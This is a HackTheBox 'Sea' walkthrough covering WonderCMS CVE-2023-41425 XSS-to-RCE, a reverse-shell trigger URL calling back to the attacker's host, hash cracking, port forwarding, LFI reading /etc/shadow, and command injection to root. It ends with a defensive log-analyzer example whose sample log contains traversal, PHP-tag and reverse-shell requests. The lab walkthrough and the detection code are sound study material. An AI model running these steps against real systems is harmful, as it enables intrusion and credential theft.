![Screenshot From 2024-12-19 09-41-05](https://hackmd.io/_uploads/Sy-hgn-rJl.png)

Hello hackers, I wanted to share a Season 6 machine from HackTheBox:

```
Name: Sea
Level: Easy
OS: Linux
Season: 6
Author: FisMatHack
```

Sea is an Easy machine from HTB that relies on enumeration to get an initial foothold. As usual with pentesting, you need to start with scanning and then move on to the other steps.

# Scanning

Scanning with nmap and rustscan, I was able to identify two open ports.

```
# Nmap 7.94SVN scan initiated Thu Dec 19 06:06:44 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p 22,80 -sC -sV -oN nmap.txt 10.10.11.28
Nmap scan report for 10.10.11.28
Host is up, received timestamp-reply ttl 63 (0.25s latency).
Scanned at 2024-12-19 06:06:47 EST for 18s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| ssh-rsa [key omitted]
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMMoxImb/cXq07mVspMdCWkVQUTq96f6rKz6j5qFBfFnBkdjc07QzVuwhYZ61PX1Dm/PsAKW0VJfw/mctYsMwjM=
|   256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHuXW9Vi0myIh6MhZ28W8FeJo0FRKNduQvcSzUAkWw7z
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Sea - Home
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 19 06:07:05 2024 -- 1 IP address (1 host up) scanned in 20.79 seconds
```

# Enumeration

As you can see above, we have two open ports: 22 and 80. I saw that port 22 was running the latest version of OpenSSH, so it is difficult to get initial access from there. The other option would be brute-forcing usernames and passwords, but since I expected something like rate limiting on SSH, I did not want to bother with that.

## Port 80

Port `80` is running a web server, as seen from nmap, so I decided to give it a smoke and see what I could do with it.

![Screenshot From 2024-12-19 07-31-57](https://hackmd.io/_uploads/SJzufcWBkx.png)

From here, I decided to run dirsearch and gobuster at the same time; while they kept running, I proceeded with manual searching.

![Screenshot From 2024-12-19 07-34-59](https://hackmd.io/_uploads/SkhMQ9-S1l.png)

```
# from dirsearch
1. /themes/
2. /messages/
3. /404
4. /plugins/
5. /home
```

After some time I realized that I could also find all of these directories manually, without wasting my CPU like this. If we check the source code of the default page, we can see all of them and some additional pages.

![Screenshot From 2024-12-19 07-38-23](https://hackmd.io/_uploads/SyB14cbSJe.png)

Looking around the source code again, I managed to find the `/contact.php` page.

![Screenshot From 2024-12-19 07-40-34](https://hackmd.io/_uploads/BkKwNc-rJg.png)

I tested things like XSS and SSRF, but none of them worked, so I decided to keep moving around in the hope of finding something else. From the source code again, there is a `/themes/` directory, so I decided to do some fuzzing on it.

![Screenshot From 2024-12-19 07-43-18](https://hackmd.io/_uploads/B1KBH9-Bkl.png)

# Footholding

![Screenshot From 2024-12-19 07-45-21](https://hackmd.io/_uploads/BkFAS5bryg.png)

### README.md

```
## /themes/bike/README.md
OUTPUT:
# WonderCMS bike theme

## Description
Includes animations.

## Author: turboblack

## Preview
![Theme preview](/preview.jpg)

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
```

### version

```
http://10.10.11.28/themes/bike/version
OUTPUT:
3.2.0
```

From the `README.md` and `version` files, I saw that I was dealing with `WonderCMS v3.2.0`.

# Exploitation

After some googling of WonderCMS and its version, I found that `v3.2.0` was vulnerable to RCE ([article](https://www.exploit-db.com/exploits/49155)). The article and its docs say you need the admin password to exploit this authenticated remote code execution, so I kept searching for an unauthenticated RCE. After some time I found this [article](https://github.com/prodigiousMind/CVE-2023-41425), which says there is an XSS that can lead us to RCE.

```
Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
```

### How the exploit works

The exploit takes three arguments: the target URL, our local IP and the local port. When we run it, it generates a malicious `xss.js` file which contains the path of a PHP reverse shell hosted on our local machine. To trigger the RCE, we send the URL generated by the exploit to the target, and once an admin clicks it, we get a connection back to our local machine.

NB: I have only summarized how the exploit works; if you read the exploit source code and the `xss.js` file, you will understand the exploit better, and how everything works.

Everything can be summarized here:

![Screenshot From 2024-12-19 07-57-38](https://hackmd.io/_uploads/H1vtq5WHye.png)

![Screenshot From 2024-12-19 08-18-42](https://hackmd.io/_uploads/r1Qvp9WHkg.png)

Sending the XSS to the admin by using the contact page:

![Screenshot From 2024-12-19 08-18-29](https://hackmd.io/_uploads/B1_va5-HJx.png)

Then we wait some 5-10 seconds for the trigger:

![Screenshot From 2024-12-19 08-27-35](https://hackmd.io/_uploads/SJhcJjZS1l.png)

The simplest way to trigger the exploit is navigating to this URL:

```
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.132&lport=1234
```

![Screenshot From 2024-12-19 08-28-04](https://hackmd.io/_uploads/S1K0JoZH1g.png)

```
## users
www-data@sea:/var/www/sea$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
amay:x:1000:1000:amay:/home/amay:/bin/bash
geo:x:1001:1001::/home/geo:/bin/bash
www-data@sea:/var/www/sea$ ls
```

Going back to `/var/www/sea`, we find a `database.js` file which contains a password hash, and it is crackable.

![Screenshot From 2024-12-19 08-30-23](https://hackmd.io/_uploads/SyZmejZr1e.png)

![Screenshot From 2024-12-19 08-33-23](https://hackmd.io/_uploads/SksaxsbrJe.png)

### ssh-creds

```
username: amay
password: <REDACTED>
```

# Privilege Escalation

Privilege escalation is kinda simple. After gaining access to the system, I tried basic enumeration without running linpeas or pspy64; with an easy machine I always like to stick to the basics.

![Screenshot From 2024-12-19 08-39-57](https://hackmd.io/_uploads/HyFDGjWByg.png)

## Pivoting

After moving here and there, I found something very interesting on an internal network.

![Screenshot From 2024-12-19 08-42-12](https://hackmd.io/_uploads/H1tRzi-BJg.png)

As we can see, there is port `8080` listening locally, so I decided to forward it to my computer as follows (local port forwarding).

![Screenshot From 2024-12-19 08-44-14](https://hackmd.io/_uploads/SJhUXs-B1x.png)

![Screenshot From 2024-12-19 08-45-15](https://hackmd.io/_uploads/rJk5ms-BJx.png)

After checking what is running via the browser, we can see that it needs authentication to access it, even via curl.

### Creds

```
username: amay
password: <REDACTED>
```

![Screenshot From 2024-12-19 08-49-56](https://hackmd.io/_uploads/HJIi4jbBJl.png)

If you click "analyze logs", you can see it prints logs, which is so weird, so I decided to fire up Burp Suite to analyze what it was calling at the backend. After checking with Burp Suite, I realized it sends a `POST` request when you click `analyze`. After some more checking here and there, I found that there is LFI/path traversal and OS command injection.

### LFI

![Screenshot From 2024-12-19 08-58-35](https://hackmd.io/_uploads/S1RGFsbHyg.png)

If you analyze what this `POST` request is trying to do, it is calling the log file (`/var/log/apache2/access.log`). We can change the file path from the one it calls to any other file.

![Screenshot From 2024-12-19 09-02-34](https://hackmd.io/_uploads/By97KiZHkg.png)

To prove that we are reading this file as root, we can fetch the `/etc/shadow` file.

![Screenshot From 2024-12-19 09-07-24](https://hackmd.io/_uploads/HkXNto-S1g.png)

This was very interesting:

![Screenshot From 2024-12-19 09-22-00](https://hackmd.io/_uploads/HJvN2o-SJx.png)

Anyway, this one was beyond root, but you can poison the logs, get command injection and then root.

### Blind OS command injection

Apart from the `LFI`, there is also a command injection; check this.

#### PoC:

![Screenshot From 2024-12-19 09-28-35](https://hackmd.io/_uploads/Bkz0TjZBJl.png)

![Screenshot From 2024-12-19 09-28-50](https://hackmd.io/_uploads/HJd0ajWH1x.png)

### root-access (shortest way to get root)

![Screenshot From 2024-12-19 09-31-21](https://hackmd.io/_uploads/B1T8CibHJe.png)

As you can see, I managed to change the SUID binary; going back to the target machine:

![Screenshot From 2024-12-19 09-33-05](https://hackmd.io/_uploads/r18T0s-HJx.png)

EXTRA STUFF: I wasn't satisfied with the blind command injection. Earlier I saw the LFI; beyond root, there is another way to get RCE by using the LFI we saw earlier. This is just a bonus, so give it a try.

Hint: use curl with the creds to send a poisoned log entry to the server; basically you can just send a simple PHP command payload, check it with `/var/log/apache2....`, and then try from there.

Like this: since I was able to read files like `/etc/shadow` and others, the only file I was not able to read was `/root/root.txt`.

![Screenshot From 2024-12-21 09-44-35](https://hackmd.io/_uploads/rJ2_VUVBJe.png)
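The port 8080 "analyze logs" endpoint above fails in two ways that are worth seeing fixed side by side: it reads whatever file path the `POST` names (the LFI), and it hands that value to a shell (the blind command injection), which is also what makes the log poisoning hinted at in EXTRA STUFF pay off. The following is an added example, not code from the box, from WonderCMS or from the writeup author. It is a hardened stand-in for such an analyzer: it confines the requested file to the log directory, invokes its helper (`wc`, chosen here as a stand-in) as an argv list with no shell, and flags the indicators this writeup leaves in an Apache access log (traversal sequences, PHP tags from poisoning, `installModule` pointed at an external URL, and `lhost=`/`lport=` style requests). The request parameter name, the helper command and the log lines are all assumptions constructed for the example.

```python
"""Hardened 'analyze logs' stand-in: path confinement, no shell, indicator scan.

Added example; not the box's application. The log root, the use of `wc` as the
helper and the sample log lines are assumptions made for this demonstration.
"""
import re
import subprocess
import tempfile
from pathlib import Path

# Assumption: the analyzer may only ever serve files under this directory.
DEFAULT_LOG_ROOT = Path("/var/log/apache2")

# Indicators a defender wants flagged in Apache access logs: traversal
# attempts (the LFI), PHP tags (log poisoning), WonderCMS installModule aimed
# at an external URL (CVE-2023-41425 chain) and reverse-shell style parameters.
INDICATORS = {
    "traversal": re.compile(r"(\.\./|\.\.%2f|%2e%2e%2f|%2e%2e/)", re.I),
    "php_tag": re.compile(r"<\?php", re.I),
    "module_install": re.compile(r"installModule=\S*?https?(?:://|%3a%2f%2f)", re.I),
    "revshell_params": re.compile(r"[?&]lhost=[^&\s]+&lport=\d+", re.I),
}


def resolve_log_path(user_path: str, root: Path = DEFAULT_LOG_ROOT) -> Path:
    """Map a user-supplied name onto ROOT and refuse anything that escapes it.

    Path.resolve() follows symlinks, so a link planted inside ROOT that points
    elsewhere is refused too. An absolute input such as '/etc/shadow' is
    refused because (root / '/etc/shadow') resolves to '/etc/shadow'.
    """
    root = root.resolve()
    candidate = (root / user_path).resolve()
    if candidate != root and root not in candidate.parents:
        raise ValueError(f"refusing path outside {root}: {user_path!r}")
    if not candidate.is_file():
        raise FileNotFoundError(user_path)
    return candidate


def count_lines_with_wc(path: Path) -> int:
    """Run the helper as an argv list: ';', '|' or '$(...)' in the file name
    are never interpreted. The injectable pattern this replaces is
    subprocess.run(f"wc -l {path}", shell=True)."""
    out = subprocess.run(["wc", "-l", str(path)], capture_output=True,
                         text=True, check=True).stdout
    return int(out.split()[0])


def scan_log(path: Path) -> list:
    """Return one finding per log line that matches any indicator."""
    findings = []
    with path.open(errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            hits = [name for name, rx in INDICATORS.items() if rx.search(line)]
            if hits:
                findings.append({"line": lineno, "indicators": hits,
                                 "text": line.rstrip()})
    return findings


def analyze(user_path: str, root: Path = DEFAULT_LOG_ROOT) -> dict:
    """What the endpoint should do with the file name it receives."""
    path = resolve_log_path(user_path, root)
    return {"file": path.name, "lines": count_lines_with_wc(path),
            "findings": scan_log(path)}


# Constructed sample log (not captured from the box). The IPs, timestamps and
# requests are made up to resemble the traffic described in the writeup.
SAMPLE_LOG = "\n".join([
    '10.10.14.5 - - [19/Dec/2024:08:18:00 -0500] "GET /home HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [19/Dec/2024:08:18:29 -0500] "POST /contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [19/Dec/2024:08:27:30 -0500] "GET /?installModule=http://10.10.14.5:8000/main.zip HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [19/Dec/2024:08:28:04 -0500] "GET /themes/revshell-main/rev.php?lhost=10.10.14.5&lport=1234 HTTP/1.1" 200 0 "-" "curl/7.88"',
    '10.10.14.5 - - [19/Dec/2024:09:40:00 -0500] "GET /..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0 "-" "<?php echo 1; ?>"',
])


def demo() -> dict:
    """Write the sample log to a temp dir, analyze it, and show the refusals."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "access.log").write_text(SAMPLE_LOG + "\n")
        report = analyze("access.log", root)
        report["refused"] = {}
        # The traversal, absolute-path and injection-shaped inputs are refused.
        for bad in ("../../etc/shadow", "/etc/shadow", "access.log; id"):
            try:
                analyze(bad, root)
                report["refused"][bad] = False
            except (ValueError, FileNotFoundError):
                report["refused"][bad] = True
        return report


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Running `demo()` analyzes only the file inside the confined directory, refuses the three hostile names, and reports lines 3, 4 and 5 of the constructed log with the indicators that match them; the first two lines, ordinary browsing and the contact form post, produce no finding. Resolving the path before the containment check is what defeats both `../` sequences and symlinks, and passing an argv list instead of a shell string is what removes the command injection entirely rather than trying to filter metacharacters.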